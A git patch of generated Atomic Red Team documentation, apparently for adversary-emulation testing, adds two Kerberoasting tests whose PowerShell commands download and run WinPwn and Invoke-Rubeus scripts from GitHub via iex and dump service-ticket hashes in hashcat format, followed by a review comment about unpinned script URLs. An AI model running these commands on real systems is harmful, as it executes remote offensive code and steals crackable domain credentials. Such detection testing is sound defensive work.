From 139749aa096af8ee36b8a6d98d0f7c8f45b22085 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Thu, 12 May 2022 23:36:46 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 22 +++++++ atomics/T1558.003/T1558.003.md | 63 +++++++++++++++++++ 6 files changed, 93 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 617cf94b..08804262 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -56,6 +56,8 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497 credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell +credential-access,T1558.003,Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell +credential-access,T1558.003,Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh 
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index ef24a636..18669f26 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -41,6 +41,8 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497 credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell +credential-access,T1558.003,Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell +credential-access,T1558.003,Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c765fbd4..79062e3f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -82,6 +82,8 @@ - Atomic Test #3: Extract all accounts in use as SPN using setspn [windows] - Atomic Test #4: Request A Single Ticket via PowerShell [windows] - Atomic Test #5: Request All Tickets via PowerShell [windows] + - Atomic Test #6: WinPwn - Kerberoasting [windows] + - Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows] - [T1555.001 Keychain](../../T1555.001/T1555.001.md) - Atomic Test #1: Keychain [macos] - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 3ff9be01..5ce6ff4d 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -63,6 +63,8 @@ - Atomic Test #3: Extract all accounts in use as SPN using setspn [windows] - Atomic Test #4: Request A Single Ticket via PowerShell [windows] - Atomic Test #5: Request All Tickets via PowerShell [windows] + - Atomic Test #6: WinPwn - Kerberoasting [windows] + - Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows] - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #1: Input Capture [windows] - [T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c64d02a7..a836ee9e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -3314,6 +3314,28 @@ credential-access: -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } \n" name: powershell + - name: WinPwn - Kerberoasting + auto_generated_guid: 78d10e20-c874-45f2-a9df-6fea0120ec27 + description: Kerberoasting technique via function of WinPwn + supported_platforms: + - windows + executor: + command: |- + $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') + Kerberoasting -consoleoutput -noninteractive + name: powershell + - name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus + auto_generated_guid: 29094950-2c96-4cbd-b5e4-f7c65079678f + description: PowerSharpPack - Kerberoasting Using Rubeus technique via function + of WinPwn + supported_platforms: + - windows + executor: + command: |- + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1') + Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap" + name: powershell T1555.001: technique: type: attack-pattern diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index a160ea8c..bdc28154 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -22,6 +22,10 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003) - [Atomic Test #5 - Request All Tickets via PowerShell](#atomic-test-5---request-all-tickets-via-powershell) +- [Atomic Test #6 - WinPwn - Kerberoasting](#atomic-test-6---winpwn---kerberoasting) + +- [Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus](#atomic-test-7---winpwn---powersharppack---kerberoasting-using-rubeus) +
@@ -269,4 +273,63 @@ Write-Host Joining this computer to a domain must be done manually +
+
+
+## Atomic Test #6 - WinPwn - Kerberoasting
+Kerberoasting technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 78d10e20-c874-45f2-a9df-6fea0120ec27
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+Kerberoasting -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
+PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 29094950-2c96-4cbd-b5e4-f7c65079678f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
+Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"
+```
+
+
+
+
+
+
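Review bot: Atomic Test #7 loads `Invoke-Rubeus.ps1` from the moving `master` ref of PowerSharpPack and runs it through `iex`, while Atomic Test #6 in the same hunk pins WinPwn.ps1 to commit `121dcee26a7aca368821563cbe92b2b5638c5773`. With an unpinned ref, the script a test host executes can change without any change in this repository, so detection results are not reproducible and the integrity of the test tooling depends on the current state of a third-party branch. Pin the URL to a reviewed commit, `.../S3cur3Th1sSh1t/PowerSharpPack/<REVIEWED_COMMIT_SHA>/PowerSharpBinaries/Invoke-Rubeus.ps1` (placeholder, not a real hash). This page is generated, so the change belongs in the source atomic definition, which is not shown here; the same command also appears in the `index.yaml` hunk. Test #6 sets `$S3cur3Th1sSh1t_repo` to an unversioned base URL; if WinPwn uses that variable for follow-on downloads, those are unpinned too, which is worth confirming.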